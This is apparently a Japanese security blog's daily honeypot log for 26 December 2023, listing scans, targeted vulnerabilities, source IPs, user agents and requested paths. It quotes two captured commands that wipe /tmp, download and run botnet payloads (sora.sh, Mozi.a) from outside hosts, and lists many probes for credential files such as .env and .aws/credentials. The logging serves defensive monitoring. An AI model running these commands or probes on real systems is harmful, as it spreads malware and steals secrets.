コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2023/12/26 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2023/12/26分です。

特徴
共通

zgrabによるスキャン行為
/.envへのスキャン行為
/.gitへのスキャン行為

Location:JP

Spring Bootの脆弱性を狙うアクセス
wgetによるスキャン行為
.jsへのスキャン行為
.sqlへのスキャン行為
/.awsへのスキャン行為
/.dockerへのスキャン行為
configファイルへのスキャン行為
5.188.210.227に関する不正通信

を確認しました。

Location:US

Spring Bootの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
WordPressへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 114.67.217.170/sora.sh;
chmod 777 *;
sh sora.sh
cd /tmp;
rm -rf *;
wget http://102.33.11.159:34741/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:UK

GPONルータの脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
curlによるスキャン行為
.jsへのスキャン行為

を確認しました。

Location:SG

Cisco Unified Operations Managerの脆弱性(CVE-2011-0966)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
Easy Hosting Control Panelの脆弱性を狙うアクセス
FCKEditorの脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Joomla!脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
Nmap Scripting Engineによるスキャン行為
.cssへのスキャン行為
.jsへのスキャン行為
.sqlへのスキャン行為
Apache Tomcatへのスキャン行為
WordPressへのスキャン行為
configファイルへのスキャン行為
phpMyAdminへのスキャン行為
Gh0stRATのような動き

を確認しました。

アクセス数推移

JP:総アクセス数:695 (前日比:525)
US:総アクセス数:123 (前日比:10)
UK:総アクセス数:96 (前日比:-29)
SG:総アクセス数:2272 (前日比:2178)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
32 2.56.247.120 Germany
1 5.188.210.227 Russia
4 18.118.107.222 United States
19 18.134.151.62 United States
519 18.138.212.58 United States
2 34.91.245.75 United States
1 45.56.108.128 United States
1 45.77.204.189 United States
1 45.138.16.215 Netherlands
64 54.187.66.79 United States
1 64.62.197.50 United States
1 64.62.197.54 United States
1 64.62.197.58 United States
1 65.49.1.112 United States
14 101.32.192.203 Singapore
1 104.192.0.61 United States
11 135.125.244.48 France
4 135.125.246.110 France
5 152.32.153.53 Hong Kong
2 159.223.77.217 United States
1 185.254.196.173 Ukraine
3 185.254.196.186 Ukraine
1 198.199.112.7 United States
2 198.235.24.17 United States
2 205.210.31.36 United States
1 217.170.204.206 Norway

UserAgent一覧

件数 UserAgent
8 'Cloud mapping experiment. Contact research@pdrlabs.net'
20 -
1 Go-http-client/1.1
1 Mozilla/5.0 (Linux; Android 9; Pixel 3 XL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
1 Mozilla/5.0 (Linux; Android 9; SM-G950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
519 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15
3 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
14 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
31 Mozilla/5.0 (Windows NT 10.0; Win64; x64)
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
85 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.0
1 Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
1 Wget/1.9.1

リクエスト内容一覧

件数 Method Request Protocol
1 \x16\x03\x01\x01\x17\x01
17 \x16\x03\x01
1 ``
1 GET /+CSCOE+/logon.html HTTP/1.1
1 GET /.aws.sh HTTP/1.1
1 GET /.aws/cloudformation/ HTTP/1.1
1 GET /.aws/cloudwatch/ HTTP/1.1
1 GET /.aws/config.yaml HTTP/1.1
2 GET /.aws/config HTTP/1.1
1 GET /.aws/configurations HTTP/1.1
1 GET /.aws/credentials.js HTTP/1.1
3 GET /.aws/credentials HTTP/1.1
1 GET /.aws/iam/ HTTP/1.1
1 GET /.aws/keypairs/ HTTP/1.1
1 GET /.aws/keys.conf HTTP/1.1
1 GET /.aws/kms/ HTTP/1.1
1 GET /.aws/lambda/ HTTP/1.1
1 GET /.aws/rds/ HTTP/1.1
1 GET /.aws/s3/config.json HTTP/1.1
1 GET /.aws/s3/credentials.ini HTTP/1.1
1 GET /.aws/s3/secrets.yaml HTTP/1.1
1 GET /.aws/secret_access_key.txt HTTP/1.1
1 GET /.aws/secrets/ HTTP/1.1
1 GET /.aws/secretsmanager/ HTTP/1.1
1 GET /.aws/ses/ HTTP/1.1
1 GET /.aws HTTP/1.1
1 GET /.circleci/config.yml HTTP/1.1
1 GET /.codeship.yaml HTTP/1.1
1 GET /.codeship.yml HTTP/1.1
1 GET /.config/gatsby/config.json HTTP/1.1
1 GET /.deployment-config.json HTTP/1.1
1 GET /.docker/.env HTTP/1.1
1 GET /.docker/config.json HTTP/1.1
1 GET /.dockerfunc HTTP/1.1
1 GET /.env-example HTTP/1.1
1 GET /.env-sample HTTP/1.1
1 GET /.env.2 HTTP/1.1
1 GET /.env.backup HTTP/1.1
2 GET /.env.bak HTTP/1.1
1 GET /.env.dev.local HTTP/1.1
1 GET /.env.dev HTTP/1.1
1 GET /.env.development.local HTTP/1.1
1 GET /.env.development.sample HTTP/1.1
1 GET /.env.development HTTP/1.1
2 GET /.env.dist HTTP/1.1
1 GET /.env.docker.dev HTTP/1.1
1 GET /.env.docker HTTP/1.1
2 GET /.env.example HTTP/1.1
1 GET /.env.local HTTP/1.1
2 GET /.env.old HTTP/1.1
1 GET /.env.php HTTP/1.1
1 GET /.env.prod.local HTTP/1.1
3 GET /.env.prod HTTP/1.1
1 GET /.env.production.local HTTP/1.1
3 GET /.env.production HTTP/1.1
1 GET /.env.project HTTP/1.1
1 GET /.env.sample.php HTTP/1.1
1 GET /.env.sample HTTP/1.1
3 GET /.env.save HTTP/1.1
1 GET /.env.stage HTTP/1.1
1 GET /.env.test.local HTTP/1.1
1 GET /.env.test.sample HTTP/1.1
1 GET /.env.test HTTP/1.1
1 GET /.env.travis HTTP/1.1
1 GET /.env.txt HTTP/1.1
1 GET /.env.www HTTP/1.1
1 GET /.env/backup HTTP/1.1
1 GET /.env1 HTTP/1.1
1 GET /.env_1 HTTP/1.1
1 GET /.env_bak HTTP/1.1
1 GET /.env_old HTTP/1.1
1 GET /.env_sample HTTP/1.1
25 GET /.env HTTP/1.1
1 GET /.environment HTTP/1.1
1 GET /.envrc HTTP/1.1
1 GET /.envs HTTP/1.1
1 GET /.flaskenv HTTP/1.1
1 GET /.ghc.environment HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /.hg HTTP/1.1
1 GET /.hsenv HTTP/1.1
1 GET /.jenkins.sh HTTP/1.1
1 GET /.jenv-version HTTP/1.1
1 GET /.json HTTP/1.1
1 GET /.jupyter/jupyter_notebook_config.json HTTP/1.1
1 GET /.lanproxy/config.json HTTP/1.1
1 GET /.msmtprc HTTP/1.1
1 GET /.pam_environment HTTP/1.1
1 GET /.phpinfo HTTP/1.1
1 GET /.powenv HTTP/1.1
1 GET /.rbenv-gemsets HTTP/1.1
1 GET /.rbenv-version HTTP/1.1
2 GET /.s3cfg HTTP/1.1
1 GET /.svn HTTP/1.1
1 GET /.travis.sh HTTP/1.1
1 GET /.travis.yml HTTP/1.1
1 GET /.venv HTTP/1.1
1 GET /.vscode/.env HTTP/1.1
1 GET /.zshenv HTTP/1.1
1 GET //api/.env HTTP/1.1
1 GET /1.php HTTP/1.1
1 GET /?phpinfo=1 HTTP/1.1
1 GET /Build.bat HTTP/1.1
2 GET /PHPConf.php HTTP/1.1
1 GET /Server.php HTTP/1.1
1 GET /Server.txt HTTP/1.1
1 GET /Server/ HTTP/1.1
1 GET /__info.php HTTP/1.1
1 GET /_info-backoffice.php HTTP/1.1
1 GET /_info.php HTTP/1.1
1 GET /_phpinf.php HTTP/1.1
2 GET /_phpinfo.php HTTP/1.1
1 GET /_poopinfo.php HTTP/1.1
1 GET /_profiler/app_dev.php/phpinfo HTTP/1.1
1 GET /_profiler/app_dev/phpinfo HTTP/1.1
1 GET /_profiler/info HTTP/1.1
1 GET /_profiler/phpinfo.php HTTP/1.1
1 GET /_profiler/phpinfo/info.php HTTP/1.1
1 GET /_profiler/phpinfo/phpinfo.php HTTP/1.1
3 GET /_profiler/phpinfo HTTP/1.1
1 GET /_wpeprivate/config.json HTTP/1.1
1 GET /a.php HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /admin-app/.env HTTP/1.1
2 GET /admin.php HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /admin/.git/config HTTP/1.1
1 GET /admin/config.php HTTP/1.1
1 GET /admin/dashboard/info.php HTTP/1.1
1 GET /admin/dashboard/phpinfo.php HTTP/1.1
1 GET /admin/dashboard/phpinfo HTTP/1.1
1 GET /admin/index.html HTTP/1.1
1 GET /admin/info.php HTTP/1.1
1 GET /admin/infophp.php HTTP/1.1
2 GET /admin/phpinfo.php HTTP/1.1
1 GET /admin/phpinfo HTTP/1.1
1 GET /administrator/info.php HTTP/1.1
1 GET /administrator/phpinfo.php HTTP/1.1
1 GET /adminphp.php HTTP/1.1
1 GET /apache.php HTTP/1.1
1 GET /apache/i.php HTTP/1.1
1 GET /apache/info.php HTTP/1.1
1 GET /apache/phpinfo.php HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /api/index.php/v1/config/application HTTP/1.1
1 GET /api/info.php HTTP/1.1
1 GET /api/phpinfo.php HTTP/1.1
1 GET /app.json HTTP/1.1
2 GET /app/.env HTTP/1.1
1 GET /app/.git/config HTTP/1.1
2 GET /app/config/parameters.yml HTTP/1.1
1 GET /app_dev.php/_profiler/phpinfo HTTP/1.1
1 GET /application.conf HTTP/1.1
1 GET /application.properties HTTP/1.1
1 GET /application.yml HTTP/1.1
2 GET /application/.env HTTP/1.1
1 GET /apps/.env HTTP/1.1
1 GET /appsettings.json HTTP/1.1
1 GET /asdf.php HTTP/1.1
1 GET /aws-credentials.sh HTTP/1.1
1 GET /aws.js HTTP/1.1
1 GET /aws.json HTTP/1.1
1 GET /aws.yml HTTP/1.1
1 GET /aws_config.js HTTP/1.1
1 GET /awsconfig.js HTTP/1.1
1 GET /awsconfig.json HTTP/1.1
1 GET /back/.env HTTP/1.1
1 GET /backend/.env HTTP/1.1
1 GET /backend/phpinfo.php HTTP/1.1
1 GET /backup/info.php HTTP/1.1
1 GET /backup/phpinfo.php HTTP/1.1
1 GET /bin/config.sh HTTP/1.1
1 GET /blog/.git/config HTTP/1.1
1 GET /build.local.xml HTTP/1.1
1 GET /build.log HTTP/1.1
1 GET /build.php HTTP/1.1
1 GET /build.properties HTTP/1.1
1 GET /build.sh HTTP/1.1
1 GET /build.xml HTTP/1.1
1 GET /build_docker.sh HTTP/1.1
1 GET /builds.sh HTTP/1.1
1 GET /bundle.js HTTP/1.1
1 GET /cdn-cgi/trace HTTP/1.1
1 GET /cgi-bin/admin_console.cgi HTTP/1.1
1 GET /cgi-bin/login.cgi HTTP/1.1
1 GET /check.php HTTP/1.1
1 GET /cms/.env HTTP/1.1
1 GET /cms/config.php HTTP/1.1
1 GET /common.sh HTTP/1.1
1 GET /composer.json HTTP/1.1
1 GET /conf.html HTTP/1.1
1 GET /conf.php.bak HTTP/1.1
1 GET /conf.php.old HTTP/1.1
1 GET /conf.php.swp HTTP/1.1
1 GET /conf.sh HTTP/1.1
1 GET /conf.swp HTTP/1.1
1 GET /config.bak HTTP/1.1
1 GET /config.codekit3 HTTP/1.1
1 GET /config.codekit HTTP/1.1
1 GET /config.conf HTTP/1.1
1 GET /config.core HTTP/1.1
1 GET /config.dat HTTP/1.1
1 GET /config.env HTTP/1.1
1 GET /config.guess HTTP/1.1
1 GET /config.h.in HTTP/1.1
1 GET /config.hash HTTP/1.1
1 GET /config.inc.bak HTTP/1.1
1 GET /config.inc.old HTTP/1.1
1 GET /config.inc.php.txt HTTP/1.1
1 GET /config.inc.php HTTP/1.1
1 GET /config.inc.txt HTTP/1.1
1 GET /config.inc HTTP/1.1
1 GET /config.ini.bak HTTP/1.1
1 GET /config.ini.old HTTP/1.1
1 GET /config.ini.php HTTP/1.1
1 GET /config.ini.txt HTTP/1.1
1 GET /config.ini HTTP/1.1
1 GET /config.js.bak HTTP/1.1
2 GET /config.js HTTP/1.1
1 GET /config.json.bak HTTP/1.1
1 GET /config.json.cfm HTTP/1.1
1 GET /config.json HTTP/1.1
1 GET /config.local.php_old HTTP/1.1
1 GET /config.local HTTP/1.1
1 GET /config.old HTTP/1.1
1 GET /config.php-eb HTTP/1.1
1 GET /config.php.bak HTTP/1.1
1 GET /config.php.bkp HTTP/1.1
1 GET /config.php.dist HTTP/1.1
1 GET /config.php.inc HTTP/1.1
1 GET /config.php.new HTTP/1.1
1 GET /config.php.old HTTP/1.1
1 GET /config.php.original HTTP/1.1
1 GET /config.php.save HTTP/1.1
1 GET /config.php.swp HTTP/1.1
1 GET /config.php.txt HTTP/1.1
1 GET /config.php.zip HTTP/1.1
1 GET /config.php HTTP/1.1
1 GET /config.prod.js HTTP/1.1
1 GET /config.properties HTTP/1.1
1 GET /config.rb HTTP/1.1
1 GET /config.ru HTTP/1.1
1 GET /config.sh HTTP/1.1
1 GET /config.source HTTP/1.1
1 GET /config.sql HTTP/1.1
1 GET /config.sub HTTP/1.1
1 GET /config.swp HTTP/1.1
1 GET /config.txt HTTP/1.1
1 GET /config.xml HTTP/1.1
1 GET /config.yml HTTP/1.1
1 GET /config/AppData.config HTTP/1.1
1 GET /config/app.php HTTP/1.1
1 GET /config/app.yml HTTP/1.1
1 GET /config/aws.yml HTTP/1.1
1 GET /config/cache.php HTTP/1.1
1 GET /config/config.inc HTTP/1.1
1 GET /config/config.ini HTTP/1.1
1 GET /config/config.js HTTP/1.1
1 GET /config/config.json HTTP/1.1
1 GET /config/config.php HTTP/1.1
2 GET /config/default.json HTTP/1.1
1 GET /config/secrets.yml HTTP/1.1
1 GET /config/settings.inc HTTP/1.1
1 GET /config/settings.ini.cfm HTTP/1.1
1 GET /config/settings.ini HTTP/1.1
1 GET /config/settings.local.yml HTTP/1.1
1 GET /configs/application.ini HTTP/1.1
1 GET /configuration.php-dist HTTP/1.1
1 GET /configuration.php HTTP/1.1
1 GET /configure.php.orig HTTP/1.1
1 GET /configure.sh HTTP/1.1
1 GET /connectionstrings.json HTTP/1.1
1 GET /console/info.php HTTP/1.1
1 GET /console/payments/config.json HTTP/1.1
1 GET /console/phpinfo.php HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /crm/.env HTTP/1.1
1 GET /crm/phpinfo.php HTTP/1.1
1 GET /cron.sh HTTP/1.1
1 GET /current/phpinfo.php HTTP/1.1
1 GET /dashboard/admin/info.php HTTP/1.1
1 GET /dashboard/admin/phpinfo.php HTTP/1.1
1 GET /dashboard/admin/phpinfo HTTP/1.1
1 GET /dashboard/i.php HTTP/1.1
3 GET /dashboard/phpinfo.php HTTP/1.1
1 GET /dashboard/phpinfo HTTP/1.1
1 GET /dashboardadmin/info.php HTTP/1.1
1 GET /dashboardadmin/phpinfo.php HTTP/1.1
1 GET /dashboardadmin/phpinfo HTTP/1.1
1 GET /database.json HTTP/1.1
1 GET /database.yml HTTP/1.1
1 GET /debug-output.txt HTTP/1.1
1 GET /debug.cgi HTTP/1.1
1 GET /debug.inc HTTP/1.1
1 GET /debug.log HTTP/1.1
1 GET /debug.php HTTP/1.1
1 GET /debug.py HTTP/1.1
1 GET /debug.txt HTTP/1.1
1 GET /debug.xml HTTP/1.1
1 GET /debug/default/view HTTP/1.1
1 GET /debug HTTP/1.1
1 GET /default.js HTTP/1.1
1 GET /demo.sh HTTP/1.1
1 GET /dep.php HTTP/1.1
1 GET /deploy.php HTTP/1.1
1 GET /dev.php HTTP/1.1
1 GET /dev.sh HTTP/1.1
1 GET /dev/phpinfo.php HTTP/1.1
1 GET /develop/info.php HTTP/1.1
1 GET /developer.php HTTP/1.1
1 GET /development/.env HTTP/1.1
1 GET /development/iinfo.php HTTP/1.1
1 GET /development/phpinfo.php HTTP/1.1
1 GET /devs.php HTTP/1.1
1 GET /docker.sh HTTP/1.1
2 GET /docker/.env HTTP/1.1
1 GET /docker_run.sh HTTP/1.1
1 GET /dump.sh HTTP/1.1
1 GET /env.bak HTTP/1.1
2 GET /env.js HTTP/1.1
1 GET /env.json HTTP/1.1
1 GET /env.list HTTP/1.1
1 GET /env.php HTTP/1.1
1 GET /env.prod.js HTTP/1.1
1 GET /env.test.js HTTP/1.1
1 GET /env.txt HTTP/1.1
1 GET /env HTTP/1.1
1 GET /enviroments/.env.production HTTP/1.1
1 GET /enviroments/.env HTTP/1.1
1 GET /environment.ts HTTP/1.1
1 GET /environment HTTP/1.1
1 GET /envrc HTTP/1.1
3 GET /favicon.ico HTTP/1.1
1 GET /fedex/.env HTTP/1.1
1 GET /fedora.php HTTP/1.1
1 GET /file/php/info.php HTTP/1.1
1 GET /file/php/phpinfo HTTP/1.1
1 GET /foo.php HTTP/1.1
1 GET /forum/info.php HTTP/1.1
1 GET /forum/phpinfo.php HTTP/1.1
1 GET /frontend_dev.php/$ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /global.asa.bak HTTP/1.1
1 GET /global.asa.old HTTP/1.1
1 GET /global.asa.orig HTTP/1.1
1 GET /global.asa.temp HTTP/1.1
1 GET /global.asa.tmp HTTP/1.1
1 GET /global.asa HTTP/1.1
1 GET /global.asax.bak HTTP/1.1
1 GET /global.asax.old HTTP/1.1
1 GET /global.asax.orig HTTP/1.1
1 GET /global.asax.temp HTTP/1.1
1 GET /global.asax.tmp HTTP/1.1
1 GET /global.asax HTTP/1.1
1 GET /global.inc.php HTTP/1.1
1 GET /global.json HTTP/1.1
1 GET /global.php HTTP/1.1
1 GET /globaladmin HTTP/1.1
1 GET /globaladminv2 HTTP/1.1
1 GET /globals.inc HTTP/1.1
1 GET /globals.jsa HTTP/1.1
1 GET /globals HTTP/1.1
1 GET /globes_admin/ HTTP/1.1
1 GET /help/phpinfo.php HTTP/1.1
1 GET /helper/info.php HTTP/1.1
1 GET /home/.aws/credentials HTTP/1.1
1 GET /html/phpinfo.php HTTP/1.1
1 GET /i.php HTTP/1.1
1 GET /in.php HTTP/1.1
1 GET /index%20js HTTP/1.1
1 GET /index.html HTTP/1.1
1 GET /index.js HTTP/1.1
1 GET /index.json HTTP/1.1
1 GET /index.php/phpinfo HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /inf.php HTTP/1.1
1 GET /info.json/ HTTP/1.1
1 GET /info.json HTTP/1.1
1 GET /info.php/ HTTP/1.1
4 GET /info.php HTTP/1.1
2 GET /info/info.php HTTP/1.1
2 GET /info/phpinfo.php HTTP/1.1
1 GET /info/phpinfo HTTP/1.1
1 GET /info HTTP/1.1
3 GET /infophp.php HTTP/1.1
1 GET /infophp/index.php HTTP/1.1
1 GET /infophp/testphp.php HTTP/1.1
2 GET /information.php HTTP/1.1
2 GET /information HTTP/1.1
1 GET /infos.php HTTP/1.1
1 GET /ini.php HTTP/1.1
1 GET /inputs.php HTTP/1.1
1 GET /jo.php HTTP/1.1
1 GET /js/config.js HTTP/1.1
1 GET /lara/info.php HTTP/1.1
1 GET /lara/phpinfo.php HTTP/1.1
2 GET /laravel/.env HTTP/1.1
1 GET /lindex.php HTTP/1.1
1 GET /linusadmin-phpinfo.php HTTP/1.1
1 GET /live_env HTTP/1.1
1 GET /local-info.php HTTP/1.1
1 GET /local-phpinfo.php HTTP/1.1
1 GET /local.json HTTP/1.1
1 GET /local.php HTTP/1.1
2 GET /local/.env HTTP/1.1
1 GET /login.jsp HTTP/1.1
1 GET /login.sh HTTP/1.1
1 GET /logon.htm HTTP/1.1
1 GET /main.js HTTP/1.1
1 GET /main.json HTTP/1.1
1 GET /main.php HTTP/1.1
1 GET /main.sh HTTP/1.1
1 GET /manage/account/login HTTP/1.1
1 GET /new.php HTTP/1.1
1 GET /of.php HTTP/1.1
1 GET /old_phpinfo.php HTTP/1.1
2 GET /p.php HTTP/1.1
1 GET /package.json HTTP/1.1
1 GET /parameters.yml HTTP/1.1
2 GET /php-info.php HTTP/1.1
1 GET /php-info/info.php HTTP/1.1
1 GET /php-info/phpinfo.php HTTP/1.1
1 GET /php-info/phpinfo HTTP/1.1
1 GET /php-info HTTP/1.1
1 GET /php.core HTTP/1.1
1 GET /php.ini-orig.txt HTTP/1.1
1 GET /php.ini.sample HTTP/1.1
1 GET /php.ini_ HTTP/1.1
1 GET /php.ini HTTP/1.1
1 GET /php.lnk HTTP/1.1
1 GET /php.log HTTP/1.1
2 GET /php.php HTTP/1.1
1 GET /php/dev/ HTTP/1.1
1 GET /php/php.cgi HTTP/1.1
1 GET /php/phpinfo.php HTTP/1.1
1 GET /php4.ini HTTP/1.1
1 GET /php5.fcgi HTTP/1.1
1 GET /php5.ini HTTP/1.1
2 GET /php_info.php HTTP/1.1
1 GET /phpconf.php HTTP/1.1
1 GET /phpinfo.html HTTP/1.1
1 GET /phpinfo.php/ HTTP/1.1
3 GET /phpinfo.php HTTP/1.1
1 GET /phpinfo/php-details.php HTTP/1.1
2 GET /phpinfo/phpinfo.php HTTP/1.1
2 GET /phpinfo HTTP/1.1
1 GET /phpinfodev.php HTTP/1.1
2 GET /phpinformation HTTP/1.1
1 GET /phpinfos.php HTTP/1.1
1 GET /phpsysinfo/info.php HTTP/1.1
1 GET /phpsysinfo/phpinfo.php HTTP/1.1
1 GET /phpsysinfo/phpsysinfo.php HTTP/1.1
2 GET /phptest.php HTTP/1.1
2 GET /phpversion.php HTTP/1.1
1 GET /pi.php HTTP/1.1
2 GET /pinfo.php HTTP/1.1
1 GET /plugin.xml HTTP/1.1
1 GET /printenv.tmp HTTP/1.1
1 GET /printenv HTTP/1.1
1 GET /private/.env HTTP/1.1
1 GET /prod/.env HTTP/1.1
1 GET /qq.php HTTP/1.1
1 GET /rest.php HTTP/1.1
1 GET /rest/.env HTTP/1.1
1 GET /robot.txt HTTP/1.1
1 GET /robots.txt.dist HTTP/1.1
2 GET /robots.txt HTTP/1.1
1 GET /root/.aws/credentials HTTP/1.1
1 GET /root/info.php HTTP/1.1
1 GET /root/phpinfo.php HTTP/1.1
1 GET /run.sh HTTP/1.1
1 GET /sample.txt HTTP/1.1
1 GET /script/.env HTTP/1.1
1 GET /scripts/index.php HTTP/1.1
1 GET /scripts/info.php HTTP/1.1
2 GET /scripts/phpinfo.php HTTP/1.1
1 GET /scripts/phpinfo HTTP/1.1
1 GET /secret_key.php HTTP/1.1
1 GET /secrets.json HTTP/1.1
1 GET /secrets.sh HTTP/1.1
1 GET /secrets.yml HTTP/1.1
1 GET /sendgrid.json HTTP/1.1
1 GET /serv-u.ini HTTP/1.1
1 GET /server-info.php HTTP/1.1
1 GET /server-info HTTP/1.1
1 GET /server-status/ HTTP/1.1
1 GET /server-status HTTP/1.1
1 GET /server.cert HTTP/1.1
1 GET /server.cfg HTTP/1.1
1 GET /server.js HTTP/1.1
1 GET /server.key HTTP/1.1
1 GET /server.log HTTP/1.1
1 GET /server.php HTTP/1.1
1 GET /server.pid HTTP/1.1
1 GET /server.sh HTTP/1.1
1 GET /server.xml HTTP/1.1
1 GET /server/config.json HTTP/1.1
1 GET /server/phpinfo.php HTTP/1.1
1 GET /server/server.js HTTP/1.1
1 GET /service.asmx HTTP/1.1
1 GET /service.grp HTTP/1.1
1 GET /service.pwd HTTP/1.1
1 GET /service/info.php HTTP/1.1
1 GET /service/phpinfo.php HTTP/1.1
1 GET /services.yml HTTP/1.1
1 GET /services/info.php HTTP/1.1
1 GET /settings.html HTTP/1.1
1 GET /settings.json HTTP/1.1
1 GET /settings.php.bak HTTP/1.1
1 GET /settings.php.dist HTTP/1.1
1 GET /settings.php.old HTTP/1.1
1 GET /settings.php.save HTTP/1.1
1 GET /settings.php.swp HTTP/1.1
1 GET /settings.php.txt HTTP/1.1
1 GET /settings.php HTTP/1.1
1 GET /settings.py HTTP/1.1
1 GET /settings.xml HTTP/1.1
1 GET /setup.data HTTP/1.1
1 GET /setup.log HTTP/1.1
1 GET /setup.php HTTP/1.1
1 GET /setup.sql HTTP/1.1
1 GET /sftp-config.json HTTP/1.1
1 GET /sh.sh HTTP/1.1
1 GET /shared/.env HTTP/1.1
1 GET /shell.sh HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /smtp.json HTTP/1.1
1 GET /sources/.env HTTP/1.1
1 GET /src/ HTTP/1.1
1 GET /src/app.js HTTP/1.1
1 GET /src/index.js HTTP/1.1
1 GET /src/phpinfo.php HTTP/1.1
1 GET /src/server.js HTTP/1.1
1 GET /start.sh HTTP/1.1
1 GET /startup.cfg HTTP/1.1
1 GET /startup.sh HTTP/1.1
1 GET /symfony/_profiler/phpinfo HTTP/1.1
1 GET /symfony/public/_profiler/phpinfo HTTP/1.1
1 GET /system/.env HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
1 GET /temp.php HTTP/1.1
1 GET /test.js HTTP/1.1
1 GET /test.php HTTP/1.1
1 GET /test1.php HTTP/1.1
1 GET /test2.php HTTP/1.1
1 GET /test_info.php HTTP/1.1
1 GET /test_phpinfo.php HTTP/1.1
1 GET /tester.php HTTP/1.1
1 GET /testing.php HTTP/1.1
1 GET /testphp.php HTTP/1.1
2 GET /testphpinfo.php HTTP/1.1
2 GET /testphpinfo HTTP/1.1
1 GET /time.php HTTP/1.1
1 GET /tmp/phpinfo.php HTTP/1.1
1 GET /token.php HTTP/1.1
1 GET /tools/info.php HTTP/1.1
1 GET /tools/phpinfo.php HTTP/1.1
1 GET /tools/phpinfo HTTP/1.1
1 GET /tz.php HTTP/1.1
1 GET /u.php HTTP/1.1
1 GET /up.php HTTP/1.1
1 GET /user-data.txt HTTP/1.1
1 GET /v3/time HTTP/1.1
1 GET /vendor/.git/config HTTP/1.1
2 GET /viewinfo.php HTTP/1.1
1 GET /web.config.tmp HTTP/1.1
1 GET /web.php HTTP/1.1
1 GET /web/.env HTTP/1.1
2 GET /webdav/info.php HTTP/1.1
2 GET /webdav/phpinfo.php HTTP/1.1
2 GET /webdav/phpinfo HTTP/1.1
1 GET /webui/ HTTP/1.1
1 GET /x.php HTTP/1.1
1 GET /xampp/phpinfo.php HTTP/1.1
1 GET /xampp/phpinfo HTTP/1.1
1 GET /~apache HTTP/1.1
1 GET /~backup HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
14 HEAD /Core/Skin/Login.aspx HTTP/1.1
1 OPTIONS / HTTP/1.0
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
4 3.133.85.124 United States
18 13.43.215.86 United States
17 20.38.12.228 United States
1 20.84.105.10 United States
2 34.147.35.21 United States
1 45.79.172.21 United States
1 45.79.181.104 United States
3 45.79.181.179 United States
2 45.79.181.223 United States
2 45.79.181.251 United States
1 45.138.16.215 Netherlands
3 54.36.115.221 France
10 54.37.79.75 France
1 62.233.50.179 Russia
2 64.62.197.50 United States
1 64.62.197.54 United States
1 65.49.1.18 United States
2 68.69.186.30 United States
2 78.153.140.219 Russia
2 78.153.140.221 Russia
2 90.151.171.106 Russia
10 90.151.171.108 Russia
1 91.92.243.232 Bulgaria
9 95.214.235.169 Ukraine
1 122.194.11.104 China
1 125.84.239.50 China
1 139.59.101.104 Singapore
1 147.182.140.185 United States
1 149.102.133.149 United States
2 162.142.125.220 United States
2 162.142.125.225 United States
2 167.71.209.152 United States
2 167.71.217.57 United States
2 167.71.217.61 United States
1 170.64.172.212 United States
1 172.104.11.4 United States
1 172.104.11.51 United States
